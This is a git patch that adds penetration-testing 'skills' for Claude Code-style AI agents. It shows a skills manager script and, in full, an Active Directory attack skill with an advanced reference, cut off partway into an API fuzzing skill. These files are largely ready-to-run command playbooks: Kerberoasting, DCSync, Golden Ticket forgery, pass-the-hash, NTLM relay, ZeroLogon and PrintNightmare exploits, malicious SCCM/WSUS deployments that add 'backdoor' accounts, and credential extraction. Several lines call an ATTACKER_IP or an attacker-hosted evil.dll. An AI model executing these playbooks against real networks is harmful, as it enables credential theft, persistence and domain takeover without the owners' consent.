From 4ee569d5d5e89a96b6be43dd6100f6cae5299229 Mon Sep 17 00:00:00 2001 From: sck_0 Date: Fri, 16 Jan 2026 17:56:47 +0100 Subject: [PATCH] feat: add claude-code-guide and import security skills --- README.md | 9 +- scripts/skills_manager.py | 119 ++++ skills/.gitignore | 3 + skills/active-directory-attacks/SKILL.md | 380 ++++++++++++ .../references/advanced-attacks.md | 382 ++++++++++++ skills/api-fuzzing-bug-bounty/SKILL.md | 430 +++++++++++++ skills/broken-authentication/SKILL.md | 473 ++++++++++++++ skills/burp-suite-testing/SKILL.md | 377 +++++++++++ skills/claude-code-guide/SKILL.md | 68 ++ skills/cloud-penetration-testing/SKILL.md | 498 +++++++++++++++ .../references/advanced-cloud-scripts.md | 318 ++++++++++ skills/file-path-traversal/SKILL.md | 483 +++++++++++++++ skills/html-injection-testing/SKILL.md | 495 +++++++++++++++ skills/idor-testing/SKILL.md | 439 +++++++++++++ skills/linux-privilege-escalation/SKILL.md | 501 +++++++++++++++ skills/metasploit-framework/SKILL.md | 475 ++++++++++++++ skills/network-101/SKILL.md | 339 ++++++++++ skills/pentest-commands/SKILL.md | 435 +++++++++++++ skills/privilege-escalation-methods/SKILL.md | 330 ++++++++++ skills/red-team-tools/SKILL.md | 307 +++++++++ skills/scanning-tools/SKILL.md | 586 ++++++++++++++++++ skills/shodan-reconnaissance/SKILL.md | 500 +++++++++++++++ skills/smtp-penetration-testing/SKILL.md | 497 +++++++++++++++ skills/sql-injection-testing/SKILL.md | 445 +++++++++++++ skills/sqlmap-database-pentesting/SKILL.md | 397 ++++++++++++ skills/ssh-penetration-testing/SKILL.md | 485 +++++++++++++++ skills/windows-privilege-escalation/SKILL.md | 493 +++++++++++++++ skills/wireshark-analysis/SKILL.md | 494 +++++++++++++++ skills/wordpress-penetration-testing/SKILL.md | 482 ++++++++++++++ skills/xss-html-injection/SKILL.md | 496 +++++++++++++++ skills_index.json | 472 ++++++++++++-- 31 files changed, 12148 insertions(+), 60 deletions(-) create mode 100755 scripts/skills_manager.py create mode 100644 skills/.gitignore create mode 100644 skills/active-directory-attacks/SKILL.md create mode 100644 skills/active-directory-attacks/references/advanced-attacks.md create mode 100644 skills/api-fuzzing-bug-bounty/SKILL.md create mode 100644 skills/broken-authentication/SKILL.md create mode 100644 skills/burp-suite-testing/SKILL.md create mode 100644 skills/claude-code-guide/SKILL.md create mode 100644 skills/cloud-penetration-testing/SKILL.md create mode 100644 skills/cloud-penetration-testing/references/advanced-cloud-scripts.md create mode 100644 skills/file-path-traversal/SKILL.md create mode 100644 skills/html-injection-testing/SKILL.md create mode 100644 skills/idor-testing/SKILL.md create mode 100644 skills/linux-privilege-escalation/SKILL.md create mode 100644 skills/metasploit-framework/SKILL.md create mode 100644 skills/network-101/SKILL.md create mode 100644 skills/pentest-commands/SKILL.md create mode 100644 skills/privilege-escalation-methods/SKILL.md create mode 100644 skills/red-team-tools/SKILL.md create mode 100644 skills/scanning-tools/SKILL.md create mode 100644 skills/shodan-reconnaissance/SKILL.md create mode 100644 skills/smtp-penetration-testing/SKILL.md create mode 100644 skills/sql-injection-testing/SKILL.md create mode 100644 skills/sqlmap-database-pentesting/SKILL.md create mode 100644 skills/ssh-penetration-testing/SKILL.md create mode 100644 skills/windows-privilege-escalation/SKILL.md create mode 100644 skills/wireshark-analysis/SKILL.md create mode 100644 skills/wordpress-penetration-testing/SKILL.md create mode 100644 skills/xss-html-injection/SKILL.md diff --git a/README.md b/README.md index 68817fe4..638a766a 100644 --- a/README.md +++ b/README.md @@ -1,17 +1,17 @@ # 🌌 Antigravity Awesome Skills: The Ultimate Claude Code Skills Collection -> **The Ultimate Collection of 60+ Agentic Skills for Claude Code (Antigravity)** +> **The Ultimate Collection of 130+ Agentic Skills for Claude Code (Antigravity)** [![License: MIT](https://img.shields.io/badge/License-MIT-yellow.svg)](https://opensource.org/licenses/MIT) [![Claude Code](https://img.shields.io/badge/AI-Claude%20Code-purple)](https://claude.ai) [![Agentic](https://img.shields.io/badge/Agentic-Framework-blue)](https://github.com/guanyang/antigravity-skills) -**Antigravity Awesome Skills** is the ultimate **Claude Code Skills** collection—a curated, battle-tested library of **71 high-performance skills** compatible with both **Antigravity** and **Claude Code**. This repository provides the essential **Claude Code skills** needed to transform your AI assistant into a full-stack digital agency, including official capabilities from **Anthropic** and **Vercel Labs**. +**Antigravity Awesome Skills** is the ultimate **Claude Code Skills** collection—a curated, battle-tested library of **131 high-performance skills** compatible with both **Antigravity** and **Claude Code**. This repository provides the essential **Claude Code skills** needed to transform your AI assistant into a full-stack digital agency, including official capabilities from **Anthropic** and **Vercel Labs**. ## 📍 Table of Contents - [Features & Categories](#features--categories) -- [Full Skill Registry](#full-skill-registry-7171) +- [Full Skill Registry](#full-skill-registry-131131) - [Installation](#installation) - [How to Contribute](#how-to-contribute) - [Credits & Sources](#credits--sources) @@ -36,7 +36,7 @@ The repository is organized into several key areas of expertise: --- -## Full Skill Registry (71/71) +## Full Skill Registry (131/131) Below is the complete list of available skills. Each skill folder contains a `SKILL.md` that can be imported into Antigravity or Claude Code. @@ -50,6 +50,7 @@ Below is the complete list of available skills. Each skill folder contains a `SK | **Autonomous Agent Patterns** | Design patterns for autonomous coding agents and tools. | `skills/autonomous-agent-patterns` ⭐ NEW | | **AWS Pentesting** | Specialized security assessment for Amazon Web Services. | `skills/aws-penetration-testing` | | **Backend Guidelines** | Core architecture patterns for Node/Express microservices. | `skills/backend-dev-guidelines` | +| **Claude Code Guide** | Master guide for configuring and using Claude Code. | `skills/claude-code-guide` ⭐ NEW | | **Concise Planning** | Atomic, actionable task planning and checklists. | `skills/concise-planning` ⭐ NEW | | **Brainstorming** | Requirement discovery and intent exploration framework. | `skills/brainstorming` | | **Brand Guidelines (Anthropic)** | Official Anthropic brand styling and visual standards. | `skills/brand-guidelines-anthropic` ⭐ NEW | diff --git a/scripts/skills_manager.py b/scripts/skills_manager.py new file mode 100755 index 00000000..4363beec --- /dev/null +++ b/scripts/skills_manager.py @@ -0,0 +1,119 @@ +#!/usr/bin/env python3 +""" +Skills Manager - Easily enable/disable skills locally + +Usage: + python3 scripts/skills_manager.py list # List active skills + python3 scripts/skills_manager.py disabled # List disabled skills + python3 scripts/skills_manager.py enable SKILL # Enable a skill + python3 scripts/skills_manager.py disable SKILL # Disable a skill +""" + +import sys +import os +from pathlib import Path + +SKILLS_DIR = Path(__file__).parent.parent / "skills" +DISABLED_DIR = SKILLS_DIR / ".disabled" + +def list_active(): + """List all active skills""" + print("🟢 Active Skills:\n") + skills = sorted([d.name for d in SKILLS_DIR.iterdir() + if d.is_dir() and not d.name.startswith('.')]) + symlinks = sorted([s.name for s in SKILLS_DIR.iterdir() + if s.is_symlink()]) + + for skill in skills: + print(f" • {skill}") + + if symlinks: + print("\n📎 Symlinks:") + for link in symlinks: + target = os.readlink(SKILLS_DIR / link) + print(f" • {link} → {target}") + + print(f"\n✅ Total: {len(skills)} skills + {len(symlinks)} symlinks") + +def list_disabled(): + """List all disabled skills""" + if not DISABLED_DIR.exists(): + print("❌ No disabled skills directory found") + return + + print("⚪ Disabled Skills:\n") + disabled = sorted([d.name for d in DISABLED_DIR.iterdir() if d.is_dir()]) + + for skill in disabled: + print(f" • {skill}") + + print(f"\n📊 Total: {len(disabled)} disabled skills") + +def enable_skill(skill_name): + """Enable a disabled skill""" + source = DISABLED_DIR / skill_name + target = SKILLS_DIR / skill_name + + if not source.exists(): + print(f"❌ Skill '{skill_name}' not found in .disabled/") + return False + + if target.exists(): + print(f"⚠️ Skill '{skill_name}' is already active") + return False + + source.rename(target) + print(f"✅ Enabled: {skill_name}") + return True + +def disable_skill(skill_name): + """Disable an active skill""" + source = SKILLS_DIR / skill_name + target = DISABLED_DIR / skill_name + + if not source.exists(): + print(f"❌ Skill '{skill_name}' not found") + return False + + if source.name.startswith('.'): + print(f"⚠️ Cannot disable system directory: {skill_name}") + return False + + if source.is_symlink(): + print(f"⚠️ Cannot disable symlink: {skill_name}") + print(f" (Remove the symlink manually if needed)") + return False + + DISABLED_DIR.mkdir(exist_ok=True) + source.rename(target) + print(f"✅ Disabled: {skill_name}") + return True + +def main(): + if len(sys.argv) < 2: + print(__doc__) + sys.exit(1) + + command = sys.argv[1].lower() + + if command == "list": + list_active() + elif command == "disabled": + list_disabled() + elif command == "enable": + if len(sys.argv) < 3: + print("❌ Usage: skills_manager.py enable SKILL_NAME") + sys.exit(1) + enable_skill(sys.argv[2]) + elif command == "disable": + if len(sys.argv) < 3: + print("❌ Usage: skills_manager.py disable SKILL_NAME") + sys.exit(1) + disable_skill(sys.argv[2]) + else: + print(f"❌ Unknown command: {command}") + print(__doc__) + sys.exit(1) + +if __name__ == "__main__": + main() diff --git a/skills/.gitignore b/skills/.gitignore new file mode 100644 index 00000000..df32d5f1 --- /dev/null +++ b/skills/.gitignore @@ -0,0 +1,3 @@ +# Local-only: disabled skills for lean configuration +# These skills are kept in the repository but disabled locally +.disabled/ diff --git a/skills/active-directory-attacks/SKILL.md b/skills/active-directory-attacks/SKILL.md new file mode 100644 index 00000000..7386fc4a --- /dev/null +++ b/skills/active-directory-attacks/SKILL.md @@ -0,0 +1,380 @@ +--- +name: Active Directory Attacks +description: This skill should be used when the user asks to "attack Active Directory", "exploit AD", "Kerberoasting", "DCSync", "pass-the-hash", "BloodHound enumeration", "Golden Ticket", "Silver Ticket", "AS-REP roasting", "NTLM relay", or needs guidance on Windows domain penetration testing. +--- + +# Active Directory Attacks + +## Purpose + +Provide comprehensive techniques for attacking Microsoft Active Directory environments. Covers reconnaissance, credential harvesting, Kerberos attacks, lateral movement, privilege escalation, and domain dominance for red team operations and penetration testing. + +## Inputs/Prerequisites + +- Kali Linux or Windows attack platform +- Domain user credentials (for most attacks) +- Network access to Domain Controller +- Tools: Impacket, Mimikatz, BloodHound, Rubeus, CrackMapExec + +## Outputs/Deliverables + +- Domain enumeration data +- Extracted credentials and hashes +- Kerberos tickets for impersonation +- Domain Administrator access +- Persistent access mechanisms + +--- + +## Essential Tools + +| Tool | Purpose | +|------|---------| +| BloodHound | AD attack path visualization | +| Impacket | Python AD attack tools | +| Mimikatz | Credential extraction | +| Rubeus | Kerberos attacks | +| CrackMapExec | Network exploitation | +| PowerView | AD enumeration | +| Responder | LLMNR/NBT-NS poisoning | + +--- + +## Core Workflow + +### Step 1: Kerberos Clock Sync + +Kerberos requires clock synchronization (±5 minutes): + +```bash +# Detect clock skew +nmap -sT 10.10.10.10 -p445 --script smb2-time + +# Fix clock on Linux +sudo date -s "14 APR 2024 18:25:16" + +# Fix clock on Windows +net time /domain /set + +# Fake clock without changing system time +faketime -f '+8h' +``` + +### Step 2: AD Reconnaissance with BloodHound + +```bash +# Start BloodHound +neo4j console +bloodhound --no-sandbox + +# Collect data with SharpHound +.\SharpHound.exe -c All +.\SharpHound.exe -c All --ldapusername user --ldappassword pass + +# Python collector (from Linux) +bloodhound-python -u 'user' -p 'password' -d domain.local -ns 10.10.10.10 -c all +``` + +### Step 3: PowerView Enumeration + +```powershell +# Get domain info +Get-NetDomain +Get-DomainSID +Get-NetDomainController + +# Enumerate users +Get-NetUser +Get-NetUser -SamAccountName targetuser +Get-UserProperty -Properties pwdlastset + +# Enumerate groups +Get-NetGroupMember -GroupName "Domain Admins" +Get-DomainGroup -Identity "Domain Admins" | Select-Object -ExpandProperty Member + +# Find local admin access +Find-LocalAdminAccess -Verbose + +# User hunting +Invoke-UserHunter +Invoke-UserHunter -Stealth +``` + +--- + +## Credential Attacks + +### Password Spraying + +```bash +# Using kerbrute +./kerbrute passwordspray -d domain.local --dc 10.10.10.10 users.txt Password123 + +# Using CrackMapExec +crackmapexec smb 10.10.10.10 -u users.txt -p 'Password123' --continue-on-success +``` + +### Kerberoasting + +Extract service account TGS tickets and crack offline: + +```bash +# Impacket +GetUserSPNs.py domain.local/user:password -dc-ip 10.10.10.10 -request -outputfile hashes.txt + +# Rubeus +.\Rubeus.exe kerberoast /outfile:hashes.txt + +# CrackMapExec +crackmapexec ldap 10.10.10.10 -u user -p password --kerberoast output.txt + +# Crack with hashcat +hashcat -m 13100 hashes.txt rockyou.txt +``` + +### AS-REP Roasting + +Target accounts with "Do not require Kerberos preauthentication": + +```bash +# Impacket +GetNPUsers.py domain.local/ -usersfile users.txt -dc-ip 10.10.10.10 -format hashcat + +# Rubeus +.\Rubeus.exe asreproast /format:hashcat /outfile:hashes.txt + +# Crack with hashcat +hashcat -m 18200 hashes.txt rockyou.txt +``` + +### DCSync Attack + +Extract credentials directly from DC (requires Replicating Directory Changes rights): + +```bash +# Impacket +secretsdump.py domain.local/admin:password@10.10.10.10 -just-dc-user krbtgt + +# Mimikatz +lsadump::dcsync /domain:domain.local /user:krbtgt +lsadump::dcsync /domain:domain.local /user:Administrator +``` + +--- + +## Kerberos Ticket Attacks + +### Pass-the-Ticket (Golden Ticket) + +Forge TGT with krbtgt hash for any user: + +```powershell +# Get krbtgt hash via DCSync first +# Mimikatz - Create Golden Ticket +kerberos::golden /user:Administrator /domain:domain.local /sid:S-1-5-21-xxx /krbtgt:HASH /id:500 /ptt + +# Impacket +ticketer.py -nthash KRBTGT_HASH -domain-sid S-1-5-21-xxx -domain domain.local Administrator +export KRB5CCNAME=Administrator.ccache +psexec.py -k -no-pass domain.local/Administrator@dc.domain.local +``` + +### Silver Ticket + +Forge TGS for specific service: + +```powershell +# Mimikatz +kerberos::golden /user:Administrator /domain:domain.local /sid:S-1-5-21-xxx /target:server.domain.local /service:cifs /rc4:SERVICE_HASH /ptt +``` + +### Pass-the-Hash + +```bash +# Impacket +psexec.py domain.local/Administrator@10.10.10.10 -hashes :NTHASH +wmiexec.py domain.local/Administrator@10.10.10.10 -hashes :NTHASH +smbexec.py domain.local/Administrator@10.10.10.10 -hashes :NTHASH + +# CrackMapExec +crackmapexec smb 10.10.10.10 -u Administrator -H NTHASH -d domain.local +crackmapexec smb 10.10.10.10 -u Administrator -H NTHASH --local-auth +``` + +### OverPass-the-Hash + +Convert NTLM hash to Kerberos ticket: + +```bash +# Impacket +getTGT.py domain.local/user -hashes :NTHASH +export KRB5CCNAME=user.ccache + +# Rubeus +.\Rubeus.exe asktgt /user:user /rc4:NTHASH /ptt +``` + +--- + +## NTLM Relay Attacks + +### Responder + ntlmrelayx + +```bash +# Start Responder (disable SMB/HTTP for relay) +responder -I eth0 -wrf + +# Start relay +ntlmrelayx.py -tf targets.txt -smb2support + +# LDAP relay for delegation attack +ntlmrelayx.py -t ldaps://dc.domain.local -wh attacker-wpad --delegate-access +``` + +### SMB Signing Check + +```bash +crackmapexec smb 10.10.10.0/24 --gen-relay-list targets.txt +``` + +--- + +## Certificate Services Attacks (AD CS) + +### ESC1 - Misconfigured Templates + +```bash +# Find vulnerable templates +certipy find -u user@domain.local -p password -dc-ip 10.10.10.10 + +# Exploit ESC1 +certipy req -u user@domain.local -p password -ca CA-NAME -target dc.domain.local -template VulnTemplate -upn administrator@domain.local + +# Authenticate with certificate +certipy auth -pfx administrator.pfx -dc-ip 10.10.10.10 +``` + +### ESC8 - Web Enrollment Relay + +```bash +ntlmrelayx.py -t http://ca.domain.local/certsrv/certfnsh.asp -smb2support --adcs --template DomainController +``` + +--- + +## Critical CVEs + +### ZeroLogon (CVE-2020-1472) + +```bash +# Check vulnerability +crackmapexec smb 10.10.10.10 -u '' -p '' -M zerologon + +# Exploit +python3 cve-2020-1472-exploit.py DC01 10.10.10.10 + +# Extract hashes +secretsdump.py -just-dc domain.local/DC01\$@10.10.10.10 -no-pass + +# Restore password (important!) +python3 restorepassword.py domain.local/DC01@DC01 -target-ip 10.10.10.10 -hexpass HEXPASSWORD +``` + +### PrintNightmare (CVE-2021-1675) + +```bash +# Check for vulnerability +rpcdump.py @10.10.10.10 | grep 'MS-RPRN' + +# Exploit (requires hosting malicious DLL) +python3 CVE-2021-1675.py domain.local/user:pass@10.10.10.10 '\\attacker\share\evil.dll' +``` + +### samAccountName Spoofing (CVE-2021-42278/42287) + +```bash +# Automated exploitation +python3 sam_the_admin.py "domain.local/user:password" -dc-ip 10.10.10.10 -shell +``` + +--- + +## Quick Reference + +| Attack | Tool | Command | +|--------|------|---------| +| Kerberoast | Impacket | `GetUserSPNs.py domain/user:pass -request` | +| AS-REP Roast | Impacket | `GetNPUsers.py domain/ -usersfile users.txt` | +| DCSync | secretsdump | `secretsdump.py domain/admin:pass@DC` | +| Pass-the-Hash | psexec | `psexec.py domain/user@target -hashes :HASH` | +| Golden Ticket | Mimikatz | `kerberos::golden /user:Admin /krbtgt:HASH` | +| Spray | kerbrute | `kerbrute passwordspray -d domain users.txt Pass` | + +--- + +## Constraints + +**Must:** +- Synchronize time with DC before Kerberos attacks +- Have valid domain credentials for most attacks +- Document all compromised accounts + +**Must Not:** +- Lock out accounts with excessive password spraying +- Modify production AD objects without approval +- Leave Golden Tickets without documentation + +**Should:** +- Run BloodHound for attack path discovery +- Check for SMB signing before relay attacks +- Verify patch levels for CVE exploitation + +--- + +## Examples + +### Example 1: Domain Compromise via Kerberoasting + +```bash +# 1. Find service accounts with SPNs +GetUserSPNs.py domain.local/lowpriv:password -dc-ip 10.10.10.10 + +# 2. Request TGS tickets +GetUserSPNs.py domain.local/lowpriv:password -dc-ip 10.10.10.10 -request -outputfile tgs.txt + +# 3. Crack tickets +hashcat -m 13100 tgs.txt rockyou.txt + +# 4. Use cracked service account +psexec.py domain.local/svc_admin:CrackedPassword@10.10.10.10 +``` + +### Example 2: NTLM Relay to LDAP + +```bash +# 1. Start relay targeting LDAP +ntlmrelayx.py -t ldaps://dc.domain.local --delegate-access + +# 2. Trigger authentication (e.g., via PrinterBug) +python3 printerbug.py domain.local/user:pass@target 10.10.10.12 + +# 3. Use created machine account for RBCD attack +``` + +--- + +## Troubleshooting + +| Issue | Solution | +|-------|----------| +| Clock skew too great | Sync time with DC or use faketime | +| Kerberoasting returns empty | No service accounts with SPNs | +| DCSync access denied | Need Replicating Directory Changes rights | +| NTLM relay fails | Check SMB signing, try LDAP target | +| BloodHound empty | Verify collector ran with correct creds | + +--- + +## Additional Resources + +For advanced techniques including delegation attacks, GPO abuse, RODC attacks, SCCM/WSUS deployment, ADCS exploitation, trust relationships, and Linux AD integration, see [references/advanced-attacks.md](references/advanced-attacks.md). diff --git a/skills/active-directory-attacks/references/advanced-attacks.md b/skills/active-directory-attacks/references/advanced-attacks.md new file mode 100644 index 00000000..1da2187e --- /dev/null +++ b/skills/active-directory-attacks/references/advanced-attacks.md @@ -0,0 +1,382 @@ +# Advanced Active Directory Attacks Reference + +## Table of Contents +1. [Delegation Attacks](#delegation-attacks) +2. [Group Policy Object Abuse](#group-policy-object-abuse) +3. [RODC Attacks](#rodc-attacks) +4. [SCCM/WSUS Deployment](#sccmwsus-deployment) +5. [AD Certificate Services (ADCS)](#ad-certificate-services-adcs) +6. [Trust Relationship Attacks](#trust-relationship-attacks) +7. [ADFS Golden SAML](#adfs-golden-saml) +8. [Credential Sources](#credential-sources) +9. [Linux AD Integration](#linux-ad-integration) + +--- + +## Delegation Attacks + +### Unconstrained Delegation + +When a user authenticates to a computer with unconstrained delegation, their TGT is saved to memory. + +**Find Delegation:** +```powershell +# PowerShell +Get-ADComputer -Filter {TrustedForDelegation -eq $True} + +# BloodHound +MATCH (c:Computer {unconstraineddelegation:true}) RETURN c +``` + +**SpoolService Abuse:** +```bash +# Check spooler service +ls \\dc01\pipe\spoolss + +# Trigger with SpoolSample +.\SpoolSample.exe DC01.domain.local HELPDESK.domain.local + +# Or with printerbug.py +python3 printerbug.py 'domain/user:pass'@DC01 ATTACKER_IP +``` + +**Monitor with Rubeus:** +```powershell +Rubeus.exe monitor /interval:1 +``` + +### Constrained Delegation + +**Identify:** +```powershell +Get-DomainComputer -TrustedToAuth | select -exp msds-AllowedToDelegateTo +``` + +**Exploit with Rubeus:** +```powershell +# S4U2 attack +Rubeus.exe s4u /user:svc_account /rc4:HASH /impersonateuser:Administrator /msdsspn:cifs/target.domain.local /ptt +``` + +**Exploit with Impacket:** +```bash +getST.py -spn HOST/target.domain.local 'domain/user:password' -impersonate Administrator -dc-ip DC_IP +``` + +### Resource-Based Constrained Delegation (RBCD) + +```powershell +# Create machine account +New-MachineAccount -MachineAccount AttackerPC -Password $(ConvertTo-SecureString 'Password123' -AsPlainText -Force) + +# Set delegation +Set-ADComputer target -PrincipalsAllowedToDelegateToAccount AttackerPC$ + +# Get ticket +.\Rubeus.exe s4u /user:AttackerPC$ /rc4:HASH /impersonateuser:Administrator /msdsspn:cifs/target.domain.local /ptt +``` + +--- + +## Group Policy Object Abuse + +### Find Vulnerable GPOs + +```powershell +Get-DomainObjectAcl -Identity "SuperSecureGPO" -ResolveGUIDs | Where-Object {($_.ActiveDirectoryRights.ToString() -match "GenericWrite|WriteDacl|WriteOwner")} +``` + +### Abuse with SharpGPOAbuse + +```powershell +# Add local admin +.\SharpGPOAbuse.exe --AddLocalAdmin --UserAccount attacker --GPOName "Vulnerable GPO" + +# Add user rights +.\SharpGPOAbuse.exe --AddUserRights --UserRights "SeTakeOwnershipPrivilege,SeRemoteInteractiveLogonRight" --UserAccount attacker --GPOName "Vulnerable GPO" + +# Add immediate task +.\SharpGPOAbuse.exe --AddComputerTask --TaskName "Update" --Author DOMAIN\Admin --Command "cmd.exe" --Arguments "/c net user backdoor Password123! /add" --GPOName "Vulnerable GPO" +``` + +### Abuse with pyGPOAbuse (Linux) + +```bash +./pygpoabuse.py DOMAIN/user -hashes lm:nt -gpo-id "12345677-ABCD-9876-ABCD-123456789012" +``` + +--- + +## RODC Attacks + +### RODC Golden Ticket + +RODCs contain filtered AD copy (excludes LAPS/Bitlocker keys). Forge tickets for principals in msDS-RevealOnDemandGroup. + +### RODC Key List Attack + +**Requirements:** +- krbtgt credentials of the RODC (-rodcKey) +- ID of the krbtgt account of the RODC (-rodcNo) + +```bash +# Impacket keylistattack +keylistattack.py DOMAIN/user:password@host -rodcNo XXXXX -rodcKey XXXXXXXXXXXXXXXXXXXX -full + +# Using secretsdump with keylist +secretsdump.py DOMAIN/user:password@host -rodcNo XXXXX -rodcKey XXXXXXXXXXXXXXXXXXXX -use-keylist +``` + +**Using Rubeus:** +```powershell +Rubeus.exe golden /rodcNumber:25078 /aes256:RODC_AES256_KEY /user:Administrator /id:500 /domain:domain.local /sid:S-1-5-21-xxx +``` + +--- + +## SCCM/WSUS Deployment + +### SCCM Attack with MalSCCM + +```bash +# Locate SCCM server +MalSCCM.exe locate + +# Enumerate targets +MalSCCM.exe inspect /all +MalSCCM.exe inspect /computers + +# Create target group +MalSCCM.exe group /create /groupname:TargetGroup /grouptype:device +MalSCCM.exe group /addhost /groupname:TargetGroup /host:TARGET-PC + +# Create malicious app +MalSCCM.exe app /create /name:backdoor /uncpath:"\\SCCM\SCCMContentLib$\evil.exe" + +# Deploy +MalSCCM.exe app /deploy /name:backdoor /groupname:TargetGroup /assignmentname:update + +# Force checkin +MalSCCM.exe checkin /groupname:TargetGroup + +# Cleanup +MalSCCM.exe app /cleanup /name:backdoor +MalSCCM.exe group /delete /groupname:TargetGroup +``` + +### SCCM Network Access Accounts + +```powershell +# Find SCCM blob +Get-Wmiobject -namespace "root\ccm\policy\Machine\ActualConfig" -class "CCM_NetworkAccessAccount" + +# Decrypt with SharpSCCM +.\SharpSCCM.exe get naa -u USERNAME -p PASSWORD +``` + +### WSUS Deployment Attack + +```bash +# Using SharpWSUS +SharpWSUS.exe locate +SharpWSUS.exe inspect + +# Create malicious update +SharpWSUS.exe create /payload:"C:\psexec.exe" /args:"-accepteula -s -d cmd.exe /c \"net user backdoor Password123! /add\"" /title:"Critical Update" + +# Deploy to target +SharpWSUS.exe approve /updateid:GUID /computername:TARGET.domain.local /groupname:"Demo Group" + +# Check status +SharpWSUS.exe check /updateid:GUID /computername:TARGET.domain.local + +# Cleanup +SharpWSUS.exe delete /updateid:GUID /computername:TARGET.domain.local /groupname:"Demo Group" +``` + +--- + +## AD Certificate Services (ADCS) + +### ESC1 - Misconfigured Templates + +Template allows ENROLLEE_SUPPLIES_SUBJECT with Client Authentication EKU. + +```bash +# Find vulnerable templates +certipy find -u user@domain.local -p password -dc-ip DC_IP -vulnerable + +# Request certificate as admin +certipy req -u user@domain.local -p password -ca CA-NAME -target ca.domain.local -template VulnTemplate -upn administrator@domain.local + +# Authenticate +certipy auth -pfx administrator.pfx -dc-ip DC_IP +``` + +### ESC4 - ACL Vulnerabilities + +```python +# Check for WriteProperty +python3 modifyCertTemplate.py domain.local/user -k -no-pass -template user -dc-ip DC_IP -get-acl + +# Add ENROLLEE_SUPPLIES_SUBJECT flag +python3 modifyCertTemplate.py domain.local/user -k -no-pass -template user -dc-ip DC_IP -add CT_FLAG_ENROLLEE_SUPPLIES_SUBJECT + +# Perform ESC1, then restore +python3 modifyCertTemplate.py domain.local/user -k -no-pass -template user -dc-ip DC_IP -value 0 -property mspki-Certificate-Name-Flag +``` + +### ESC8 - NTLM Relay to Web Enrollment + +```bash +# Start relay +ntlmrelayx.py -t http://ca.domain.local/certsrv/certfnsh.asp -smb2support --adcs --template DomainController + +# Coerce authentication +python3 petitpotam.py ATTACKER_IP DC_IP + +# Use certificate +Rubeus.exe asktgt /user:DC$ /certificate:BASE64_CERT /ptt +``` + +### Shadow Credentials + +```bash +# Add Key Credential (pyWhisker) +python3 pywhisker.py -d "domain.local" -u "user1" -p "password" --target "TARGET" --action add + +# Get TGT with PKINIT +python3 gettgtpkinit.py -cert-pfx "cert.pfx" -pfx-pass "password" "domain.local/TARGET" target.ccache + +# Get NT hash +export KRB5CCNAME=target.ccache +python3 getnthash.py -key 'AS-REP_KEY' domain.local/TARGET +``` + +--- + +## Trust Relationship Attacks + +### Child to Parent Domain (SID History) + +```powershell +# Get Enterprise Admins SID from parent +$ParentSID = "S-1-5-21-PARENT-DOMAIN-SID-519" + +# Create Golden Ticket with SID History +kerberos::golden /user:Administrator /domain:child.parent.local /sid:S-1-5-21-CHILD-SID /krbtgt:KRBTGT_HASH /sids:$ParentSID /ptt +``` + +### Forest to Forest (Trust Ticket) + +```bash +# Dump trust key +lsadump::trust /patch + +# Forge inter-realm TGT +kerberos::golden /domain:domain.local /sid:S-1-5-21-xxx /rc4:TRUST_KEY /user:Administrator /service:krbtgt /target:external.com /ticket:trust.kirbi + +# Use trust ticket +.\Rubeus.exe asktgs /ticket:trust.kirbi /service:cifs/target.external.com /dc:dc.external.com /ptt +``` + +--- + +## ADFS Golden SAML + +**Requirements:** +- ADFS service account access +- Token signing certificate (PFX + decryption password) + +```bash +# Dump with ADFSDump +.\ADFSDump.exe + +# Forge SAML token +python ADFSpoof.py -b EncryptedPfx.bin DkmKey.bin -s adfs.domain.local saml2 --endpoint https://target/saml --nameid administrator@domain.local +``` + +--- + +## Credential Sources + +### LAPS Password + +```powershell +# PowerShell +Get-ADComputer -filter {ms-mcs-admpwdexpirationtime -like '*'} -prop 'ms-mcs-admpwd','ms-mcs-admpwdexpirationtime' + +# CrackMapExec +crackmapexec ldap DC_IP -u user -p password -M laps +``` + +### GMSA Password + +```powershell +# PowerShell + DSInternals +$gmsa = Get-ADServiceAccount -Identity 'SVC_ACCOUNT' -Properties 'msDS-ManagedPassword' +$mp = $gmsa.'msDS-ManagedPassword' +ConvertFrom-ADManagedPasswordBlob $mp +``` + +```bash +# Linux with bloodyAD +python bloodyAD.py -u user -p password --host DC_IP getObjectAttributes gmsaAccount$ msDS-ManagedPassword +``` + +### Group Policy Preferences (GPP) + +```bash +# Find in SYSVOL +findstr /S /I cpassword \\domain.local\sysvol\domain.local\policies\*.xml + +# Decrypt +python3 Get-GPPPassword.py -no-pass 'DC_IP' +``` + +### DSRM Credentials + +```powershell +# Dump DSRM hash +Invoke-Mimikatz -Command '"token::elevate" "lsadump::sam"' + +# Enable DSRM admin logon +Set-ItemProperty "HKLM:\SYSTEM\CURRENTCONTROLSET\CONTROL\LSA" -name DsrmAdminLogonBehavior -value 2 +``` + +--- + +## Linux AD Integration + +### CCACHE Ticket Reuse + +```bash +# Find tickets +ls /tmp/ | grep krb5cc + +# Use ticket +export KRB5CCNAME=/tmp/krb5cc_1000 +``` + +### Extract from Keytab + +```bash +# List keys +klist -k /etc/krb5.keytab + +# Extract with KeyTabExtract +python3 keytabextract.py /etc/krb5.keytab +``` + +### Extract from SSSD + +```bash +# Database location +/var/lib/sss/secrets/secrets.ldb + +# Key location +/var/lib/sss/secrets/.secrets.mkey + +# Extract +python3 SSSDKCMExtractor.py --database secrets.ldb --key secrets.mkey +``` diff --git a/skills/api-fuzzing-bug-bounty/SKILL.md b/skills/api-fuzzing-bug-bounty/SKILL.md new file mode 100644 index 00000000..f2e52c61 --- /dev/null +++ b/skills/api-fuzzing-bug-bounty/SKILL.md @@ -0,0 +1,430 @@ +--- +name: API Fuzzing for Bug Bounty +description: This skill should be used when the user asks to "test API security", "fuzz APIs", "find IDOR vulnerabilities", "test REST API", "test GraphQL", "API penetration testing", "bug bounty API testing", or needs guidance on API security assessment techniques. +--- + +# API Fuzzing for Bug Bounty + +## Purpose + +Provide comprehensive techniques for testing REST, SOAP, and GraphQL APIs during bug bounty hunting and penetration testing engagements. Covers vulnerability discovery, authentication bypass, IDOR exploitation, and API-specific attack vectors. + +## Inputs/Prerequisites + +- Burp Suite or similar proxy tool +- API wordlists (SecLists, api_wordlist) +- Understanding of REST/GraphQL/SOAP protocols +- Python for scripting +- Target API endpoints and documentation (if available) + +## Outputs/Deliverables + +- Identified API vulnerabilities +- IDOR exploitation proofs +- Authentication bypass techniques +- SQL injection points +- Unauthorized data access documentation + +--- + +## API Types Overview + +| Type | Protocol | Data Format | Structure | +|------|----------|-------------|-----------| +| SOAP | HTTP | XML | Header + Body | +| REST | HTTP | 